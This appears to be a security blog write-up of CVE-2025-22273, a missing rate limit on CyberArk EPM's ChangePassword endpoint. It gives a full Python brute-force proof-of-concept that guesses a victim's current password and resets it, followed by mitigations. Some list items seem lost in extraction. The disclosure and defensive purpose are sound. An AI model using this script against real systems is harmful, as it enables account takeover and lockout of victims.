On June 2024, a security issue surfaced in CyberArk Endpoint Privilege Manager (EPM), specifically in SaaS version 24.7.1. Tracked as CVE-2025-22273, the bug allows attackers to attempt unlimited password guesses at a sensitive endpoint, making brute force attacks feasible and dangerous. Unfortunately, attempts to get a response from CyberArk about this were unsuccessful as of publication.
In this article, we'll break down this vulnerability, show a proof-of-concept (PoC) attack, and offer direct guidance to organizations and security professionals.
What is CVE-2025-22273?
CVE-2025-22273 describes a situation where the CyberArk EPM application fails to limit the number or frequency of user interactions – in this case, password change requests. This flaw appears at the endpoint:
POST /EPMUI/VfManager.asmx/ChangePassword
Here, attackers can endlessly send requests with guessed passwords, trying combinations at high speed. No rate-limiting, captchas, or account lockouts will stop them.
Tool: Any HTTP client (curl, Burp Suite, a custom Python script, etc).
3. Method: Attacker builds a script that sends repeated POST requests to the vulnerable endpoint, using all possible password guesses (commonly from a dictionary or via incremental brute force).
4. Outcome: Eventually, if the password is weak or in the dictionary, the attacker could gain access to that profile.
Below is a proof-of-concept showing how an attacker might automate brute-forcing
import requests
TARGET_URL = 'https://target-domain/EPMUI/VfManager.asmx/ChangePassword';
USERNAME = 'victim.user@company.com'
PASSWORD_LIST = 'passwords.txt'
def attempt_change_password(session, current_password, new_password='NewStrong$Pass3'):
data = {
'username': USERNAME,
'currentPassword': current_password,
'newPassword': new_password
}
response = session.post(TARGET_URL, data=data)
# You may need to adjust parsing per response
if 'success' in response.text.lower():
print(f"[+] Password found: {current_password}")
return True
return False
def main():
session = requests.Session()
with open(PASSWORD_LIST, 'r') as f:
for line in f:
password = line.strip()
print(f"Trying: {password}")
if attempt_change_password(session, password):
break
if __name__ == '__main__':
main()
The above code checks each password in passwords.txt against the /ChangePassword endpoint until it finds the valid current password.
> Warning: The above code is for educational purposes and lawful security testing (with permission) _only_!
If successful, they could change the victim’s password and lock them out.
- Attackers may escalate privileges, steal sensitive information, plant malware, or launch further attacks inside the victim’s network.
Reference(s)
- CyberArk Official EPM Product Page
- CVE-2025-22273 at MITRE (pending)
Until an official fix is available, you should
1. Monitor your logs: Watch for repeated failed password changes. Lock or alert any user accounts with high error rates.
2. Put a reverse proxy in front: Use tools like Nginx or Apache to rate-limit requests to /EPMUI/VfManager.asmx/ChangePassword.
User training: Remind users to look for suspicious alerts or password change attempts.
5. Contact CyberArk: Request information on a fix and urge the implementation of rate-limiters or brute-force protection.
Conclusion
CVE-2025-22273 demonstrates the persistent risk from classic brute force attacks, especially on endpoints that lack modern rate-limiting. While the primary responsibility rests with the vendor to patch, organizations can and should take their own measures now.
If your organization uses CyberArk EPM SaaS (24.7.1), prioritize mitigations and demand an official fix. Don’t leave doors open for attackers.
*This long read is original research gathered from real-world testing. Please reference responsibly. For collaboration or further technical details, please reach out via responsible disclosure channels.*
Timeline
Published on: 02/28/2025 13:15:27 UTC
Last modified on: 03/05/2025 16:15:38 UTC